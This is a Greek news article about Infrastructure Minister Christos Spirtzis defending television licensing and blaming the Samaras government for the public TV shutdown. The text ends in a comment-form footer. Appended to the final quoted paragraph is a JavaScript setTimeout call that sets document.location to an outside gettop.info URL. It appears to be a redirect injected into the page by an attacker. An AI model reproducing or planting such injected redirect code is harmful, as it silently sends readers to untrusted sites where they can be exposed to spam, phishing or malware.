Σπίρτζης: Το «μαύρο» είναι ιδιοκτησία της κυβέρνησης Σαμαρά

0
3

 

Τη βεβαιότητα ότι δεν θα χαθούν θέσεις εργασίας, αλλά θα αυξηθούν, εκφράζει με συνέντευξή του στη Realnews, ο υπουργός Υποδομών .

«Αν υπολογίσουμε τον ελάχιστο αριθμό – όχι τον πραγματικό που θα είναι μεγαλύτερος – στα πανελλαδικά και στα περιφερειακά κανάλια, θα διαπιστώσουμε ότι οι θέσεις εργασίας αυξάνονται. Η παραγωγή πρότυπων προγραμμάτων ενημέρωσης πολιτισμού και ψυχαγωγίας βάζει ψηλά τον πήχη της απασχόλησης και της ποιότητας. Τελειώνει η εργασιακή ζούγκλα της αδήλωτης, ανασφάλιστης, χαμηλά αμειβόμενης και απλήρωτης εργασίας. Απευθυνόμενος στους εργαζόμενους θα τους έλεγα ότι, παρά την απολύτως αιτιολογημένη ανησυχία τους, έρχονται καλύτερες και ποιοτικότερες ημέρες. Λίγη υπομονή μέχρι την ολοκλήρωση των αδειοδοτήσεων» δηλώνει ο Χρήστος Σπίρτζης.

Σε ερώτηση για το μαύρο στα κανάλια, ο υπουργός Υποδομών απάντησε: «Το «μαύρο» είναι ιδιοκτησία της κυβέρνησης Σαμαρά, των υπουργών και των πολιτικών δυνάμεων που το υλοποίησαν παράνομα, στα μοναδικά αδειοδοτημένα κανάλια της δημόσιας τηλεόρασης. Η συνέχεια του «μαύρου» ήταν η μονοφωνία των τηλεοπτικών σταθμών και των κομμάτων «της αλήθειας να λέγεται», σε δύο εκλογικές αναμετρήσεις και σε ένα δημοψήφισμα. Πήραν την απάντηση από τον ελληνικό λαό, που μας έδωσε την εντολή να τελειώσουμε τον παλαιοκομματισμό και τις δομές συντήρησής του. Αυτό κάναμε και αυτό θα συνεχίσουμε να κάνουμε. Έγινε μια πρωτόγνωρη, διαφανής και ανοιχτή σε όλους διαγωνιστική διαδικασία έπειτα από 27 χρόνια. Δημιουργήσαμε την απαραίτητη προϋπόθεση για την ανεξαρτησία και την πολυφωνία» υπογράμμισε ο Χ. Σπίρτζης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here